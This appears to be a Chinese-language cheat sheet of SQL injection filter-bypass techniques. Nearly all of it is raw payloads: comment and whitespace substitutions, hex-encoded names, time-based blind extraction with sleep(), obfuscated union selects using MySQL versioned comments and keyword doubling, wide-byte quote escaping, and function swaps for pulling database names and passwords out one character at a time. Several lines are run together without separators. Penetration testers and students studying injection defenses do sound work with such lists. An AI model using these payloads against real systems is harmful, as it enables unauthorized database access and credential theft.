SQL注入绕过总结

%20 %09 %0a %0b %0c %0d %a0 %00 /**/  /*注释*/

select(user())from database where(1=1)and(2=2)id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23

select column_name  from information_schema.tables where table_name="users"select column_name  from information_schema.tables where table_name=0x7573657273

select substr(database() from 1 for 1);select mid(database() from 1 for 1);

union select 1,2     #等价于union select * from (select 1)a join (select 2)b

select ascii(mid(user(),1,1))=80   #等价于select user() like 'r%'

select * from news limit 0,1# 等价于下面这条SQL语句select * from news limit 1 offset 0

select * from users where id=1 and ascii(substr(database(),0,1))>64select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

between a and b;between 1 and 1; #等价于 =1

and=&& or=|| xor=| not=!

id=1' union select 1,2,3||'1

id=1' union select 1,2,'3

//，-- , /**/, #, --+, -- -, ;,%00,--aU/**/ NION /**/ SE/**/ LECT /**/user，pwd from user

id=-1'UnIoN/**/SeLeCT

id=-1'/*!UnIoN*/ SeLeCT 1,2,concat(/*!table_name*/) FrOM /*information_schema*/.tables /*!WHERE *//*!TaBlE_ScHeMa*/ like database()#

id=-1'UNIunionONSeLselectECT1,2,3–-

or 1=1等价于%6f%72%20%31%3d%31

hex()、bin() ==> ascii()sleep() ==>benchmark()concat_ws()==>group_concat()mid()、substr() ==> substring()@@user ==> user()@@datadir ==> datadir()举例：substring()和substr()无法使用时：?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74　或者：substr((select 'password'),1,1) = 0x70strcmp(left('password',1), 0x69) = 1strcmp(left('password',1), 0x70) = 0strcmp(left('password',1), 0x71) = -1

?id=1' and 1=1#?id=1%df' and 1=1#

id=1' and%23%0a 1%23%0a=1id=1' union%23aaa%0aselect 1,2,3--+
id=1' /*!14440order by*/3--+id=1' /*!14440union*//*!14440select*/1,2,3--+
id=1'and -1=-1id=1'and -1=-2id=1'and ~1=~1id=1'and ~1=~2id=1' and BINARY 1 --+id=1' and BINARY 0 --+